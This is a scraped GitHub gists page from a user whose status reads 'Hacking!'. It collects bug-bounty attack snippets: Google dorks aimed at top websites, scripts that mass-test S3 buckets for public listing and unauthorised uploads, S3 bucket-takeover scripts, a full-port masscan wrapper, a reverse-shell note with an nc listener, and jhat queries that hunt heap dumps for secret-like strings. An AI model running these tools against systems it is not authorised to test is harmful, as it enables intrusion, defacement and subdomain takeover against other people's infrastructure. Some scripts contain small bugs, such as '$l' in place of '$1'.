Skip to content

Instantly share code, notes, and snippets.

💭
Hacking!

Robbie random-robbie

💭
Hacking!
Block or report user

Report or block random-robbie

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@random-robbie
random-robbie / alexa.txt
Created Dec 22, 2016
alex top 500 dork
View alexa.txt
site:*.Google.com inurl:'&'
site:*.Youtube.com inurl:'&'
site:*.Facebook.com inurl:'&'
site:*.Baidu.com inurl:'&'
site:*.Wikipedia.org inurl:'&'
site:*.Yahoo.com inurl:'&'
site:*.Google.co.in inurl:'&'
site:*.Amazon.com inurl:'&'
site:*.Qq.com inurl:'&'
site:*.Google.co.jp inurl:'&'
View bucket_list.sh
echo "[*] Now Checking for Open S3 Buckets for listing dirs....[*]"
aws s3 ls s3://$1 --acl public-read >/dev/null 2>/dev/null
RESULT=$?
if [ $RESULT -eq 0 ]; then
echo "[*] Bucket has Dirlistings Enabled [*]"
echo "[*] Bucket has Dirlistings Enabled https://$1.s3.amazonaws.com [*]" >> /home/tools/mass-bounty/s3-results/$1-dirlistings.txt
View bucket_upload.sh
echo "[*] Now Checking for Open S3 Buckets to upload POC to....[*]"
aws s3 cp poc.txt s3://$1 --acl public-read >/dev/null 2>/dev/null
RESULT=$?
if [ $RESULT -eq 0 ]; then
echo "[*] POC Uploaded to https://$1.s3.amazonaws.com/poc.txt [*]"
echo "[*] POC Uploaded to https://$l.s3.amazonaws.com/poc.txt [*]" >> /home/tools/mass-bounty/s3-results/$1-uploads.txt
else
View bucket-takeover.sh
#!/bin/bash
aws s3api create-bucket --bucket $1 --acl public-read --region us-east-1
aws s3api put-bucket-website --bucket $1 --website-configuration file://redirect.json
View mass-scan.sh
#!/bin/bash
strip=$(echo $1|sed 's/https\?:\/\///')
echo ""
echo "######################################"
echo $strip
echo "######################################"
echo ""
massscan -p1-65535 $(dig +short $strip|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee $strip_scan
View reverseshell.md

How to get reverse shell

Setup a listener on your VPS to connect back to

nc -lvp 4444
View s3-commands.md

Some S3 Commands

// Copy MyFile.txt in current directory to s3://my-bucket/path
$ aws s3 cp MyFile.txt s3://my-bucket/path/

// Move all .jpg files in s3://my-bucket/path to ./MyDirectory
$ aws s3 mv s3://my-bucket/path ./MyDirectory --exclude '*' --include '*.jpg' --recursive
View s3-pwn.md

If you are reading this then there is a chance you have a poc.txt in your s3 bucket.

This is just a little heads up to say attackers can upload and overwrite files in your s3 bucket and if you are serving up files like JS they can add an XSS or coinhive to your js.

If you login to your AWS console find the bucket please remove the public-write permission from the bucket and this will fix the issue.

How to test a s3 bucket for bad permissions

View s3tko.sh
#!/bin/bash
touch index.html
touch error.html
aws s3api create-bucket --bucket $1 --region us-east-1
aws s3 website s3://$1/ --index-document index.html --error-document error.html
aws s3 cp index.html s3://$1 --acl public-read
aws s3 cp error.html s3://$1 --acl public-read
View jhat base searches
select {o: s,val:s.value.toString()} from java.lang.String s
where
/^[0-9A-Za-z!\\\/\"\?/+=;\&\(\)\[\]\.:-_@\'\#\*]{5,15}$/.test(s.value.toString())
select {o: s,val:s.value.toString()} from java.lang.String s
where
/^[0-9A-Za-z!\\\/\"\?/+=;\&\(\)\[\]\.:-_@\'\#\*]{19,31}$/.test(s.value.toString())
select {o: s,val:s.value.toString()} from java.lang.String s
where
You can’t perform that action at this time.